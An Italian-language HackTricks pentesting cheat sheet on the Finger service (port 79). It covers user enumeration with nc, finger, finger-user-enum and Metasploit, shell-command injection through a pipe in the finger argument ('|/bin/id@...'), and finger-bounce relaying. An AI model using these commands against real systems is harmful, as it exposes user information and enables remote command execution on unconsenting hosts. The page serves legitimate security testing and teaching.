# 79 - Pentesting Finger {{#include ../banners/hacktricks-training.md}} ## **Informazioni di base** Il programma/servizio **Finger** è utilizzato per recuperare dettagli sugli utenti del computer. Tipicamente, le informazioni fornite includono il **nome utente, nome completo**, e, in alcuni casi, dettagli aggiuntivi. Questi dettagli extra potrebbero comprendere la posizione dell'ufficio e il numero di telefono (se disponibile), l'ora in cui l'utente ha effettuato l'accesso, il periodo di inattività (tempo di inattività), l'ultima volta che la posta è stata letta dall'utente e i contenuti dei file di piano e progetto dell'utente. **Porta predefinita:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Enumerazione** ### **Acquisizione del banner/Connessione di base** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Enumerazione degli utenti** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` In alternativa, puoi utilizzare **finger-user-enum** da [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), alcuni esempi: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap esegue uno script utilizzando script predefiniti** ### Metasploit utilizza più trucchi di Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan - `port:79 USER` ## Esecuzione comandi ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Usa un sistema come relay finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` {{#include ../banners/hacktricks-training.md}}